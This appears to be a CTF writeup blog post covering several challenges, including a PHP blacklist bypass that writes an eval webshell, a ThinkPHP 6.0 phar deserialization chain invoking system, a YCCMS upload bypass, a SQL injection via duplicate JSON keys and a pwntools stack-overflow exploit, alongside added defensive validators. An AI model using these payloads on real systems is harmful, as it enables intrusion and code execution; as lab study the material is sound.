This post was last updated 430 days ago; the information in it may have since developed or changed.

Follow the official account and send it a message and it hands you the flag; nothing more to say.

The attachment is a zip archive; download it and brute-force the password.

Adjust the image height and the hidden part becomes visible.

Copy the two out and scan the QR code.

`hex -> base64 -> base32 -> base64`

This challenge claims you have to click the button 28,800 times to get the flag; obviously nobody actually clicks it that many times.

In challenges like this the flag is usually sitting in the JavaScript. Here it is in main.js: base64-decoding `var1` gives it.

Another sign-in challenge, very simple.

So just go and look at the robots.txt file.

Right-click is disabled, but the developer tools can be opened from the browser's settings menu; the right-click isn't needed.

Refresh, and the flag appears in the page source.

This challenge is slightly harder.
```php
<?php
error_reporting(0);
if (isset($_REQUEST["cmd"])) {
    $shell = $_REQUEST["cmd"];
    // Each str_ireplace deletes its token once, case-insensitively, in this order.
    $shell = str_ireplace(" ", "", $shell);
    $shell = str_ireplace("\n", "", $shell);
    $shell = str_ireplace("\t", "", $shell);
    $shell = str_ireplace("?", "", $shell);
    $shell = str_ireplace("*", "", $shell);
    $shell = str_ireplace("<", "", $shell);
    $shell = str_ireplace("system", "", $shell);
    $shell = str_ireplace("passthru", "", $shell);
    $shell = str_ireplace("ob_start", "", $shell);
    $shell = str_ireplace("getenv", "", $shell);
    $shell = str_ireplace("putenv", "", $shell);
    $shell = str_ireplace("mail", "", $shell);
    $shell = str_ireplace("error_log", "", $shell);
    $shell = str_ireplace("`", "", $shell);
    $shell = str_ireplace("exec", "", $shell);
    $shell = str_ireplace("shell_exec", "", $shell);
    $shell = str_ireplace("echo", "", $shell);
    $shell = str_ireplace("cat", "", $shell);
    $shell = str_ireplace("ls", "", $shell);
    $shell = str_ireplace("nl", "", $shell);
    $shell = str_ireplace("tac", "", $shell);
    $shell = str_ireplace("bash", "", $shell);
    $shell = str_ireplace("sh", "", $shell);
    $shell = str_ireplace("tcp", "", $shell);
    $shell = str_ireplace("base64", "", $shell);
    $shell = str_ireplace("flag", "", $shell);
    $shell = str_ireplace("cp", "", $shell);
    // exec() runs the command but its output is never sent back to the client.
    exec($shell);
} else {
    highlight_file(__FILE__);
}
```
So it is really just a matter of bypassing these filters to execute commands. Since `exec` runs the command without returning its output, the approach is to write a webshell and read the flag through it.

First grab the `<?php` line, then double-write the filtered word so that an `eval` call is appended to the file:

```
?cmd=head${IFS}-1${IFS}index.php>a.php;ecechoho${IFS}"eval(\$_POST[cmd]);">>a.php
```

Then connect with AntSword.
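The double-write works because each `str_ireplace` deletes its token exactly once: removing `echo` from `ecechoho` leaves `ec` + `ho`, which is `echo` again. The following is an added example, not the challenge's code: a Python re-implementation of the blacklist chain above, next to the checks a defender would use instead (repeat until stable, reject rather than repair, or an allowlist of fixed commands). The sample input is the page's own payload, copied here without the `?cmd=` prefix.

```python
"""Why a delete-once blacklist leaks.  Added example, not the challenge's
code: the str_ireplace chain re-implemented in Python, beside the checks a
defender would use instead.  The sample command is the writeup's payload."""
import re

# The tokens the challenge removes, in the same order as the PHP source.
BLACKLIST = [" ", "\n", "\t", "?", "*", "<", "system", "passthru", "ob_start",
             "getenv", "putenv", "mail", "error_log", "`", "exec", "shell_exec",
             "echo", "cat", "ls", "nl", "tac", "bash", "sh", "tcp", "base64",
             "flag", "cp"]

# Constructed copy of the payload from the writeup, without the "?cmd=" prefix.
PAYLOAD = 'head${IFS}-1${IFS}index.php>a.php;ecechoho${IFS}"eval(\\$_POST[cmd]);">>a.php'


def _ireplace(haystack, needle):
    """Case-insensitive, single left-to-right pass, like PHP's str_ireplace."""
    return re.sub(re.escape(needle), "", haystack, flags=re.IGNORECASE)


def single_pass_filter(cmd):
    """The challenge's logic: every token is deleted exactly once, in order.
    Deleting 'echo' from 'ecechoho' leaves the halves 'ec' + 'ho' = 'echo'."""
    for tok in BLACKLIST:
        cmd = _ireplace(cmd, tok)
    return cmd


def fixpoint_filter(cmd):
    """Repeat the pass until the string stops changing.  This closes the
    double-write hole, but deletion-based sanitising is still the wrong
    design: anything the list does not name passes through untouched."""
    while True:
        nxt = single_pass_filter(cmd)
        if nxt == cmd:
            return cmd
        cmd = nxt


def is_clean(cmd):
    """Reject-don't-repair: True only when no listed token appears anywhere."""
    low = cmd.lower()
    return not any(tok.lower() in low for tok in BLACKLIST)


def allowlist_ok(cmd, allowed=("id", "whoami", "uptime")):
    """What the endpoint should have done: pick one of a fixed set of
    commands and never hand user-controlled text to exec() at all."""
    return cmd in allowed


if __name__ == "__main__":
    print("single pass :", single_pass_filter(PAYLOAD))
    print("fixpoint    :", fixpoint_filter(PAYLOAD))
    print("is_clean    :", is_clean(PAYLOAD))
    print("allowlisted :", allowlist_ok(PAYLOAD))
```

Running it shows `echo` surviving the single pass and disappearing under the fixpoint filter, while `is_clean` and `allowlist_ok` both refuse the request outright, which is the only version of this endpoint that does not depend on the completeness of the list.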
A browser extension showed the site runs PHP. Requesting a non-existent route produced an error page that revealed ThinkPHP 6.0.

The best-known ThinkPHP 6.0 vulnerability is its deserialization bug, and the deserialization point in this challenge should be the file upload. I had done similar challenges before, so the phar protocol came to mind as the way to trigger it. The next step is generating the phar file.

Generating a phar file requires changing the php.ini configuration.
```php
<?php
namespace think;

abstract class Model
{
    use model\concern\Attribute;
    private $lazySave;
    protected $withEvent;
    private $exists;
    private $force;
    protected $table;

    function __construct($obj = '')
    {
        $this->lazySave = true;
        $this->withEvent = false;
        $this->exists = true;
        $this->force = true;
        $this->table = $obj;
    }
}

namespace think\model\concern;

trait Attribute
{
    private $data = ["Lethe" => "id"];
    private $withAttr = ["Lethe" => "system"];
}

namespace think\model;

use think\Model;
use Phar;

class Pivot extends Model {}

$a = new Pivot();
$b = new Pivot($a);

// Write the object into the phar metadata; the stub is the minimal phar loader.
@unlink("SKI12.phar");
$phar = new Phar("SKI12.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($b);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();
```
Browse the files in turn to find the flag.

Flag obtained.

YCCMS code audit (beginner tutorial) - 0DayBug - cnblogs.com

This is really a code audit challenge: requesting /www.zip gives you the source, and searching for YCCMS turns up the corresponding vulnerabilities. The challenge chains two of them into one exploit path and slightly modifies the original code.

Change the administrator password.

At this step, be careful not to change the username: the file upload requires the user to be admin.

A little auditing of the source shows that the upload vulnerability is the LOGO upload; intercept the request and modify it to bypass the filter.

The bypass could not be simpler: the filename is split into an array on `.` and only the second element is checked, so `shell.png.php` passes.
```php
private $typeArr = array('jpeg', 'jpg', 'png', 'gif'); // allowed types

// Validate the type
private function checkType() {
    if (!in_array(explode('.', $this->name)[1], $this->typeArr)) {
        Tool::alertBack('警告:不合法的上传类型!');
    }
}
```
The uploaded file then lands at the logo path shown in the admin backend. The filename is rewritten as well, but the extension is kept, which is all that matters.
```php
// Set the new file name
private function setNewName() {
    $_nameArr = explode('.', $this->name);
    $_postfix = $_nameArr[count($_nameArr) - 1];
    //$_newname = date('YmdHis').mt_rand(100,1000).'.'.$_postfix;
    $_newname = 'logo.' . $_postfix;
    $this->linkpath = UPLOGO . $_newname;
    return $this->path . $_newname;
}
```

`/view/index/images/logo.php`
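Both upload bugs on this page come from trusting the wrong part of the upload: the YCCMS check reads the first extension while the rename keeps the last, and the ThinkPHP challenge accepts a phar archive because only the name is looked at, not the bytes. The following is an added example and not YCCMS or ThinkPHP code: an upload validator that takes the final extension only, checks it against an allowlist, requires the content to start with that type's magic bytes, and refuses any file carrying a phar stub regardless of its name. The sample uploads are constructed inline.

```python
"""Upload validation for the two holes discussed above: the YCCMS check that
reads the FIRST extension (so shell.png.php passes as png) and a phar archive
smuggled in under an image name.  Added example, not YCCMS or ThinkPHP code;
the sample files are constructed inline."""
import os

# Allowed extensions and the magic bytes each must start with.
ALLOWED = {
    "jpeg": (b"\xff\xd8\xff",),
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# PHP locates a phar's manifest through this stub token, so its presence in
# an "image" means the file can be loaded as an archive whatever its name.
PHAR_STUB = b"__HALT_COMPILER();"


def extension_of(name):
    """Everything after the LAST dot, lowercased ('' if there is none).
    The vulnerable check used explode('.')[1], i.e. the first extension."""
    base = os.path.basename(name)
    return base.rsplit(".", 1)[1].lower() if "." in base else ""


def validate_upload(name, data):
    """Return (ok, reason): final extension in the allowlist, content starting
    with that type's magic bytes, and no phar stub anywhere in the bytes."""
    ext = extension_of(name)
    if ext not in ALLOWED:
        return False, f"extension {ext!r} not allowed"
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, "content does not match declared type"
    if PHAR_STUB in data:
        return False, "phar stub found in upload"
    return True, "ok"


def stored_name(name):
    """Server-chosen filename (use only after validate_upload passed): a fixed
    base plus the validated extension, so nothing from the client's name
    reaches the filesystem."""
    return "logo." + extension_of(name)


# Constructed sample uploads.
SAMPLES = {
    "logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
    "shell.png.php": b"<?php eval($_POST['cmd']); ?>",
    "banner.gif": b"GIF89a" + b"<?php __HALT_COMPILER(); ?>" + b"\x00" * 8,
    "fake.png": b"GIF89a" + b"\x00" * 16,
}

if __name__ == "__main__":
    for fname, blob in SAMPLES.items():
        print(fname, validate_upload(fname, blob))
```

The magic-byte check alone is not enough, since an archive can be prefixed with a valid image header; that is why the stub scan runs over the whole file even after the header matched.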
greatwall2021 | FYHSSGSS's blog

A cheap solve: this challenge was solved within seconds of release and the code base is large, so I guessed it was a recycled challenge. A Google search confirmed it.

It turned out to be from the Great Wall Cup 2021 final. I found the second writeup and it worked directly.
```http
POST /search HTTP/1.1
Host: 7b5da769-56bb-4c55-bb95-fcdd7957a989.node.honkersecuritycommando.site:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://7b5da769-56bb-4c55-bb95-fcdd7957a989.node.honkersecuritycommando.site:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json
Connection: close
Content-Length: 91

{
    "votes": 1,
    "name": "1' union select 123,secret,3 from token --+",
    "name": [
    ]
}
```
Then use the obtained token to access the flag endpoint and it is solved:

```
/flag%3faction=readFlag&token=re@l1y_4th_T0k3n
```
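The request body above carries the `name` key twice, once as an injection string and once as an empty array; which occurrence each server component kept is not explained in the writeup, but duplicate keys are exactly the kind of input a strict parser should refuse. The following is an added example and not the challenge's code: a `json.loads` wrapper that rejects duplicate keys, and the string-built query beside a parameterised one, run against a constructed in-memory SQLite schema so the difference is visible. Table and column names (`items`, `token`, `secret`) are chosen to match the payload and are assumptions.

```python
"""Duplicate JSON keys and the query behind the payload.  Added example,
not the challenge's code: a strict parser that refuses repeated keys, and
the vulnerable string-built query beside a parameterised one, against a
constructed in-memory SQLite schema."""
import json
import sqlite3

# Constructed copy of the JSON body from the captured request.
REQUEST_BODY = """{
"votes":1,
"name": "1' union select 123,secret,3 from token --+",
"name":[
]
}"""


def parse_strict(body):
    """json.loads that raises on duplicate keys instead of silently keeping
    one occurrence (Python's default keeps the last one)."""
    def no_dupes(pairs):
        seen = set()
        for key, _ in pairs:
            if key in seen:
                raise ValueError(f"duplicate key: {key!r}")
            seen.add(key)
        return dict(pairs)
    return json.loads(body, object_pairs_hook=no_dupes)


def has_duplicate_keys(body):
    """True when parse_strict would reject the body."""
    try:
        parse_strict(body)
    except ValueError:
        return True
    return False


def first_name_value(body):
    """The first 'name' occurrence, as a lenient first-wins parser would see it."""
    pairs = json.loads(body, object_pairs_hook=lambda p: p)
    return next(v for k, v in pairs if k == "name")


def last_name_value(body):
    """The last 'name' occurrence, which is what Python's json keeps by default."""
    return json.loads(body)["name"]


def build_db():
    """Toy schema (assumed): an items table with three columns and a token table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE items(id INTEGER, name TEXT, extra TEXT);
        CREATE TABLE token(secret TEXT);
        INSERT INTO items VALUES (1, 'apple', 'x');
        INSERT INTO token VALUES ('constructed-secret');
    """)
    return conn


def search_unsafe(conn, name):
    """String concatenation: the UNION in the payload becomes part of the query."""
    sql = f"SELECT id, name, extra FROM items WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def search_safe(conn, name):
    """Type check plus a bound parameter: the payload is compared as plain data."""
    if not isinstance(name, str):
        raise TypeError("name must be a string")
    sql = "SELECT id, name, extra FROM items WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("duplicate keys :", has_duplicate_keys(REQUEST_BODY))
    print("first / last   :", first_name_value(REQUEST_BODY), last_name_value(REQUEST_BODY))
    print("unsafe         :", search_unsafe(db, first_name_value(REQUEST_BODY)))
    print("safe           :", search_safe(db, first_name_value(REQUEST_BODY)))
```

`first_name_value` and `last_name_value` disagree on the same body, which is the property a duplicate-key differential relies on; rejecting the body up front removes that ambiguity, and the bound parameter removes the injection even when a bad value does get through.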
Downloaded the file and guessed it was 64-bit; too lazy to run checksec, so I opened it straight in IDA64.

No need to look any further: the most basic stack overflow, with a backdoor function at 0x400741. Just overflow into that address.

Overflow up to the return address and overwrite it with the backdoor; the padding length is 0x40 + 0x8.
```python
from pwn import *

# hsc2019.site:10929
p = remote('hsc2019.site', 10929)
system_addr = 0x400741                          # address of the backdoor function
buf = b'a' * (0x40 + 0x8) + p64(system_addr)    # padding up to the return address, then the backdoor
p.sendline(buf)
p.interactive()
```
After input is entered, the flag function is called to compute the values.

The script to recover it:
```python
# Encoded bytes recovered from the binary
str1 = "igdb~Mumu@p&>%;%<$<p"


def flag(a1, a2):
    """Reverse the per-character transform: a1 is the byte, a2 its index."""
    v3 = a1
    if a2 > 9:
        if (a2 & 1) == 0:
            v3 = a1 - 11
        if a2 % 2 == 1:
            v3 += 13
    else:
        if (a2 & 1) == 0:
            v3 = a1 - 3
        if a2 % 2 == 1:
            v3 += 5
    return v3


# Walk every character of str1 (a fixed count larger than the string would index past its end)
for i in range(len(str1)):
    print(chr(flag(ord(str1[i]), i)), end="")
print()
```